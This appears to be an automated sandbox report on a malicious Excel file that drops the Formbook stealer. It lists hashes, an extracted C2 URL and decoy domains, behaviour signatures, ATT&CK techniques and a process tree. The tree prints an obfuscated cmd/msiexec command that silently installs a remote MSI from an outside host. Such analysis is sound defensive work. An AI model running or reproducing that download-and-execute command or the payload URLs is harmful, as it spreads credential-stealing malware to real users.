Overview

overview

10

Static

static

8

fadb21a70a...87.xls

windows7_x64

10

fadb21a70a...87.xls

windows10_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-05-2021 12:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls

  • Size

    37KB

  • MD5

    abc73f6301b9f828dce46943b7111f29

  • SHA1

    fadb21a70ab5923cbe8e8deeb36af5e07efd0e87

  • SHA256

    ac0ccf59d64faf079e0d4e93ec994865214aefd0899f644da81f8e748e4ee153

  • SHA512

    00f1499e6db64cf9bc94bba3a90382f5b045a3e291e65ef8db68a916cf586353d48ac7509c30c14c0da1b1557ac96ba60cf2a5214321395892473634dc56b813

Score
10/10
formbookratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.craftsman-vail.com/cca/

Decoy

whenpigsflyhigh.com

artistiklounge.com

tinytrendstique.com

projektpartner-ag.com

charvelevh.com

easycompliances.net

zengheqiye.com

professionalmallorca.com

bonzerstudio.com

nelivo.com

yangxeric.com

aredntech.com

twincitieshousingmarket.com

allshadesunscreen.com

xiang-life.net

qmcp00011.com

lindsayeandmarkv.com

fbcsbvsbvsjbvjs.com

saveonthrivelife.com

newdpo.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
    installer
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fadb21a70ab5923cbe8e8deeb36af5e07efd0e87.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tfv88791.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\SysWOW64\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/tfv88791.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1540
    • C:\Windows\SysWOW64\colorcpl.exe
      "C:\Windows\SysWOW64\colorcpl.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSI8DC2.tmp"
        3⤵
          PID:1264
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1784
      • C:\Windows\Installer\MSI8DC2.tmp
        "C:\Windows\Installer\MSI8DC2.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\Installer\MSI8DC2.tmp
          "C:\Windows\Installer\MSI8DC2.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:1060

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    3
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\Installer\MSI8DC2.tmp
      MD5

      caccaec6ca54e341eb266b3b98978178

      SHA1

      e02d383072613e1e65a8991adc941b65a82f8be7

      SHA256

      20b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479

      SHA512

      838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e

      Download Submit
    • C:\Windows\Installer\MSI8DC2.tmp
      MD5

      caccaec6ca54e341eb266b3b98978178

      SHA1

      e02d383072613e1e65a8991adc941b65a82f8be7

      SHA256

      20b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479

      SHA512

      838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e

      Download Submit
    • C:\Windows\Installer\MSI8DC2.tmp
      MD5

      caccaec6ca54e341eb266b3b98978178

      SHA1

      e02d383072613e1e65a8991adc941b65a82f8be7

      SHA256

      20b92c186a1abf1b15f080ae6c7ec6e995c712158df4869827ecc8e1df9e9479

      SHA512

      838e18e94b8b6523feb2263475a238fceae6cb8703b69eb05a1ee3a8052389daf91b898fef692e51173c7fee7840b046663a808d556a75d6b62c431cb835cf0e

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nsx8E8A.tmp\0djwv1e4o91gu5.dll
      MD5

      b8efcf07411a1081f73080bd83f3bf1e

      SHA1

      b534be3372f363f2ae50be8fa8fd94fec8c0dae2

      SHA256

      7faeba7a3e10c3eccd92d119327a0d7e8b0aa99c7ca956326bff1c83ce011440

      SHA512

      3ba6a145c27d62f4d8cfea644945a86d1321e61e0677bae217cc5003f4fad486e56481354f8fd7c46aceea69c6f1824b8efbe17461e319a48940d8b63a53f79c

      Download Submit
    • memory/768-74-0x00000000004B0000-0x00000000004B2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/768-67-0x0000000000000000-mapping.dmp
      Download
    • memory/1060-77-0x0000000000A10000-0x0000000000A24000-memory.dmp
      Filesize

      80KB

      Download
    • memory/1060-76-0x0000000000700000-0x0000000000A03000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1060-75-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/1060-72-0x000000000041EB70-mapping.dmp
      Download
    • memory/1092-79-0x0000000000000000-mapping.dmp
      Download
    • memory/1092-85-0x0000000000A10000-0x0000000000AA3000-memory.dmp
      Filesize

      588KB

      Download
    • memory/1092-84-0x0000000000C40000-0x0000000000F43000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1092-81-0x0000000000F60000-0x0000000000F78000-memory.dmp
      Filesize

      96KB

      Download
    • memory/1092-82-0x00000000000C0000-0x00000000000EE000-memory.dmp
      Filesize

      184KB

      Download
    • memory/1252-86-0x0000000007D50000-0x0000000007ED0000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/1252-78-0x0000000006BE0000-0x0000000006D2E000-memory.dmp
      Filesize

      1.3MB

      Download
    • memory/1264-83-0x0000000000000000-mapping.dmp
      Download
    • memory/1540-65-0x0000000076691000-0x0000000076693000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1540-64-0x0000000000000000-mapping.dmp
      Download
    • memory/1784-66-0x000007FEFBFB1000-0x000007FEFBFB3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1920-61-0x00000000716C1000-0x00000000716C3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1920-60-0x000000002F651000-0x000000002F654000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1920-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1996-63-0x0000000000000000-mapping.dmp
      Download